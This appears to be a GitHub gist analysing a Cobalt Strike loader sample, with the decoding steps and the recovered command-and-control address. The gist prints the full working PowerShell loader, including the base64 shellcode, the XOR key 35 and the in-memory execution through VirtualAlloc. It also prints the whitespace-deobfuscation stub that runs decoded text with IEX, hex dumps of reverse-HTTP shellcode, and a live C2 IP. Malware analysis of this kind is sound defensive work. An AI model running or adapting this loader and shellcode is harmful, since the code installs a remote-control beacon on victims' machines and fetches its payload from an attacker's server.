- Malware Function Capabilities:
Cobalt Strike Loader
- Command & Control (C2) Address:
Last active
June 25, 2024 09:32
-
-
Save x86fatah/3323d74c15ef28bc09fbc03dc910155c to your computer and use it in GitHub Desktop.
Cobalt Strike Beacons Analysis 2024
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Malware code that was written in spaces and tabs. | |
| Set-StrictMode -Version 2 | |
| $DoIt = @' | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
| return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
| } | |
| function func_get_delegate_type { | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, | |
| [Parameter(Position = 1)] [Type] $var_return_type = [Void] | |
| ) | |
| $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
| $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| return $var_type_builder.CreateType() | |
| } | |
| [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckssBCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTncVRiOrGHfkE6c3pSZftB/+KLykmFiMJrXg/9lpyAITBQnjq5qJnrNcOBGVyEobWQQc18TYvXZmbfrHDBJ9sqFn9nHPgkQqpmgBg0UqI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxITDRMYA3RKTUdMVFADbXcDFQ0RGAN3UUpHRk1XDBUNEwouKSNe9HRosw0AwFSTyRc8u3hziphW75JBJ1QstyoiSV/Nz+MA98FHKTQ0Co2CWBy94lon/5HHmYsJmf4CToYmX8Ply8PfoS21LyMMsjNgb9EiWPpILBoISre/h6eNdma5w6cxpM/TMSmt5CN7bGyxUH+O8Dq2iatOs/toah8PH5mK53SoaXdBvx8QG0Tl64Xg9vd1JRLZ2ICaUG4VyAMc/cY7Qdh+Bq75C2kyAcpHR955IJphyOi1TqC815K6eCFmHprHHSKlFp865s9Sb2QUKWalgbMwtFxxkSAYkWfKPRBHJiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcFxoNERARDREREQ0WGyNqtSHx') | |
| for ($x = 0; $x -lt $var_code.Count; $x++) { | |
| $var_code[$x] = $var_code[$x] -bxor 35 | |
| } | |
| $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) | |
| $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) | |
| [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) | |
| $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) | |
| $var_runme.Invoke([IntPtr]::Zero) | |
| '@ | |
| If ([IntPtr]::size -eq 8) { | |
| start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job | |
| } | |
| else { | |
| IEX $DoIt | |
| } | |
| # Deobfucation Code | |
| | foreach-object{ | |
| $pjzhiwqu =$_ -split ' ' | # Split the string with double space(group) | |
| foreach-object { ' ';$_.split(' ') | # Split the string with space(subgroup) | |
| foreach-object{$_.length- 1 } # Count characters(tabs)-1 | |
| }; | |
| -join(( ( -join ( $pjzhiwqu[0..($pjzhiwqu.length-1)] )).trimstart( ' ').split( ' ')| | |
| foreach-object{ ([char] [int] $_)} ))|.( $shellid[1]+$shellid[13]+'x') | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 000000A0: FF D5 31 FF 57 57 57 57 57 68 3A 56 79 A7 FF D5 ..1.WWWWWh:Vy... | |
| 000000B0: E9 84 00 00 00 5B 31 C9 51 51 6A 03 51 51 68 0F .....[1.QQj.QQh. | |
| 000000C0: 27 00 00 53 50 68 57 89 9F C6 FF D5 EB 70 5B 31 '..SPhW......p[1 | |
| ... | |
| 00000130: 74 B7 31 FF E9 91 01 00 00 E9 C9 01 00 00 E8 8B t.1............. | |
| 00000140: FF FF FF 2F 6D 54 36 65 00 88 3B 54 C7 30 84 14 .../mT6e..;T.0.. | |
| 00000150: 86 05 7C 97 3C DD 0B 9F 87 BB 7B AF 05 96 C3 DC ..|.<.....{..... | |
| ... | |
| 00000300: C3 85 C0 75 E5 58 C3 E8 A9 FD FF FF 34 39 2E 32 ...u.X......49.2 | |
| 00000310: 33 32 2E 32 32 32 2E 35 38 00 49 96 02 D2 32.222.58.I... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - Decrypts and dumps the configuration of Cobalt Strike Windows beacons (PE files), shellcode and memory dumps. | |
| File: ps-cobalt-decrypted.dat | |
| Found shellcode: | |
| Identification: CS reverse http x86 shellcode | |
| Parameter: 778 b'49.232.222.58' | |
| license-id: 792 1234567890 | |
| push : 190 9999 b"h\x0f'\x00\x00" | |
| push : 716 4096 b'h\x00\x10\x00\x00' | |
| push : 747 8192 b'h\x00 \x00\x00' | |
| String: 323 b'/mT6e' | |
| String: 403 b'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)' | |
| 00000000: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B ......`..1.d.R0. | |
| 00000010: 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 R..R..r(..J&1.1. | |
| 00000020: AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52 57 .<a|., .......RW | |
| 00000030: 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A 01 .R..B<...@x..tJ. | |
| 00000040: D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34 8B .P.H..X ...<I.4. | |
| 00000050: 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75 F4 ..1.1.......8.u. | |
| 00000060: 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66 8B .}.;}$u.X.X$..f. | |
| 00000070: 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24 24 .K.X.........D$$ | |
| 00000080: 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86 5D [[aYZQ..X_Z....] | |
| 00000090: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 hnet.hwiniThLw&. | |
| 000000A0: FF D5 31 FF 57 57 57 57 57 68 3A 56 79 A7 FF D5 ..1.WWWWWh:Vy... | |
| 000000B0: E9 84 00 00 00 5B 31 C9 51 51 6A 03 51 51 68 0F .....[1.QQj.QQh. | |
| 000000C0: 27 00 00 53 50 68 57 89 9F C6 FF D5 EB 70 5B 31 '..SPhW......p[1 | |
| 000000D0: D2 52 68 00 02 40 84 52 52 52 53 52 50 68 EB 55 .Rh..@.RRRSRPh.U | |
| 000000E0: 2E 3B FF D5 89 C6 83 C3 50 31 FF 57 57 6A FF 53 .;......P1.WWj.S | |
| 000000F0: 56 68 2D 06 18 7B FF D5 85 C0 0F 84 C3 01 00 00 Vh-..{.......... | |
| 00000100: 31 FF 85 F6 74 04 89 F9 EB 09 68 AA C5 E2 5D FF 1...t.....h...]. | |
| 00000110: D5 89 C1 68 45 21 5E 31 FF D5 31 FF 57 6A 07 51 ...hE!^1..1.Wj.Q | |
| 00000120: 56 50 68 B7 57 E0 0B FF D5 BF 00 2F 00 00 39 C7 VPh.W....../..9. | |
| 00000130: 74 B7 31 FF E9 91 01 00 00 E9 C9 01 00 00 E8 8B t.1............. | |
| 00000140: FF FF FF 2F 6D 54 36 65 00 88 3B 54 C7 30 84 14 .../mT6e..;T.0.. | |
| 00000150: 86 05 7C 97 3C DD 0B 9F 87 BB 7B AF 05 96 C3 DC ..|.<.....{..... | |
| 00000160: FA 4A EB 21 30 26 2A C0 88 B9 AA BD 90 7F 1B 32 .J.!0&*......⌂.2 | |
| 00000170: B6 EB 69 38 7A 27 3F F4 E7 FB 9E 55 45 4E D9 E4 ..i8z'?....UEN.. | |
| 00000180: 2F 31 5E 91 82 44 D5 52 EC A1 67 09 85 4B 22 A0 /1^..D.R..g..K". | |
| 00000190: 66 09 00 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D f..User-Agent: M | |
| 000001A0: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 ozilla/5.0 (comp | |
| 000001B0: 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 31 30 2E atible; MSIE 10. | |
| 000001C0: 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 0; Windows NT 6. | |
| 000001D0: 32 3B 20 54 72 69 64 65 6E 74 2F 36 2E 30 29 0D 2; Trident/6.0). | |
| 000001E0: 0A 00 7D D7 57 4B 90 2E 23 E3 77 B0 EA 34 1F 98 ..}.WK..#.w..4.. | |
| 000001F0: 5B 50 A9 BB 75 CC B1 62 04 77 0F 94 09 01 6A 7C [P..u..b.w....j| | |
| 00000200: EE EC C0 23 D4 E2 64 0A 17 17 29 AE A1 7B 3F 9E ...#..d...)..{?. | |
| 00000210: C1 79 04 DC B2 E4 BA A8 2A BA DD 21 6D A5 05 7C .y......*..!m..| | |
| 00000220: E0 C6 E8 E0 FC 82 0E 96 0C 00 2F 91 10 43 4C F2 ........../..CL. | |
| 00000230: 01 7B D9 6B 0F 39 2B 69 94 9C A4 84 AE 55 45 9A .{.k.9+i.....UE. | |
| 00000240: E0 84 12 87 EC F0 12 0A 8E C7 00 58 4F 4F 92 73 ...........XOO.s | |
| 00000250: 5C AD D3 19 95 AA 88 6D 90 D8 4B 49 3C 2C 3C BA \......m..KI<,<. | |
| 00000260: A9 C4 57 8B 4A 54 62 9C 3C 33 38 67 C6 C8 A6 C3 ..W.JTb.<38g.... | |
| 00000270: D5 D4 56 06 31 FA FB A3 B9 73 4D 36 EB 20 3F DE ..V.1....sM6. ?. | |
| 00000280: E5 18 62 FB 5D 25 8D DA 28 4A 11 22 E9 64 64 FD ..b.]%..(J.".dd. | |
| 00000290: 5A 03 B9 42 EB CB 96 6D 83 9F F4 B1 99 5B 02 45 Z..B...m.....[.E | |
| 000002A0: 3D B9 E4 3E 01 86 35 BC 19 C5 EC 71 4C 47 37 0A =..>..5....qLG7. | |
| 000002B0: 45 86 A2 90 13 97 7F 52 B2 03 3B B2 44 E9 1E 33 E.....⌂R..;.D..3 | |
| 000002C0: 64 05 00 68 F0 B5 A2 56 FF D5 6A 40 68 00 10 00 d..h...V..j@h... | |
| 000002D0: 00 68 00 00 40 00 57 68 58 A4 53 E5 FF D5 93 B9 .h..@.WhX.S..... | |
| 000002E0: 00 00 00 00 01 D9 51 53 89 E7 57 68 00 20 00 00 ......QS..Wh. .. | |
| 000002F0: 53 56 68 12 96 89 E2 FF D5 85 C0 74 C6 8B 07 01 SVh........t.... | |
| 00000300: C3 85 C0 75 E5 58 C3 E8 A9 FD FF FF 34 39 2E 32 ...u.X......49.2 | |
| 00000310: 33 32 2E 32 32 32 2E 35 38 00 49 96 02 D2 32.222.58.I... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Cobalt Strike Loader | |
| 1. From Base 64 | |
| 2. XOR decryption key: 35 | |
| 3. Change to decimal format | |
| 4. C2 Found: 49.232.222.58 | |
| 38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckssBCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTncVRiOrGHfkE6c3pSZftB/+KLykmFiMJrXg/9lpyAITBQnjq5qJnrNcOBGVyEobWQQc18TYvXZmbfrHDBJ9sqFn9nHPgkQqpmgBg0UqI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxITDRMYA3RKTUdMVFADbXcDFQ0RGAN3UUpHRk1XDBUNEwouKSNe9HRosw0AwFSTyRc8u3hziphW75JBJ1QstyoiSV/Nz+MA98FHKTQ0Co2CWBy94lon/5HHmYsJmf4CToYmX8Ply8PfoS21LyMMsjNgb9EiWPpILBoISre/h6eNdma5w6cxpM/TMSmt5CN7bGyxUH+O8Dq2iatOs/toah8PH5mK53SoaXdBvx8QG0Tl64Xg9vd1JRLZ2ICaUG4VyAMc/cY7Qdh+Bq75C2kyAcpHR955IJphyOi1TqC815K6eCFmHprHHSKlFp865s9Sb2QUKWalgbMwtFxxkSAYkWfKPRBHJiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcFxoNERARDREREQ0WGyNqtSHx |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment